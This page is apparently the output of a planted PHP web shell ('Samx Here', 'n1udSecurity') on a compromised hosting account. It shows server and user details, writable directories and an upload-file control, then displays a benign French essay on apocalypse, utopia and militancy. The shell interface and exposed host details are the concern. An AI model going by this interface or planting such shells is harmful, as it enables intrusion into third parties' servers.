Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/dieu/Audio/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/dieu/Audio/2017-10-27QuestCeQueLapocalypse.txt
L'apocalypse est la fin d'un monde pour la création d'un nouveau monde. Une société est très difficile à organiser, par le simple fait que chacun veut en obtenir quelque chose de propre à soi. Ainsi ceux qui ne militent pas pour leur bonheur, ceux qui pensent qu'il ne s'agit que de vivre, comme si la vie était une obligation au lieu d'être une chance, suivent une décadence proposée par ceux qui veulent obtenir la société pour eux-mêmes. Ainsi toute société dérive à cause du manque de vie dans la société, du manque de compréhension du sens de mission, à cause de la tristesse de ce qui est proposé. 
Il s'agit au contraire que chacun soit utopique. Ce sont ceux qui cherchent à changer la société selon l'utopie qui créent le nouveau monde, qu'il soit parfait ou pas, qu'il arrive à être parfait ou pas. Chaque fois, l'utopie sera trop exigeante pour ceux qui la dirigent. Il s'agit à chacun de découvrir l'utopie des autres pour transformer la sienne afin que le nouveau monde apporte le bonheur. 
Ceux qui militent sont heureux et joyeux car ils pensent apporter le bonheur à la société. Cela leur donne une utilité donc un sens à leur vie. Cela leur apporte aussi des astuces qu'aucun n'aurait pensé avoir. Ils savent qu'il y a un autre monde à construire à cause des inégalités qu'ils perçoivent. 
Faire de la politique consiste à se sentir utile par ses projets artistiques ou techniques, ensuite contredits par la philosophie scientifique des autres. Alors le militant devient lui aussi philosophe et scientifique, pour améliorer au mieux la société. Débattre avec les autres permet à ses projets d'aboutir.
Selon la science et l'apocalypse selon Saint-Jean, nous nous dirigeons vers un univers qui fusionnera avec le nôtre. Selon Saint-Jean, la magie de la transformation dépassera la science humaine pour la création d'un monde ou univers idéal. Il s'agit donc de nous transformer par la recherche de vérité, avec notre éducation, pour et par notre entourage, par notre métier, par nos loisirs, par Dieu plus tard ou avec notre mission.

Mes Notes

Chercher à militer, pour le bonheur des autres et le sien. Cela peut être un objectif à long terme grâce à l'architecture puis par les vérités trouvées, par un échec sinon.


SAMX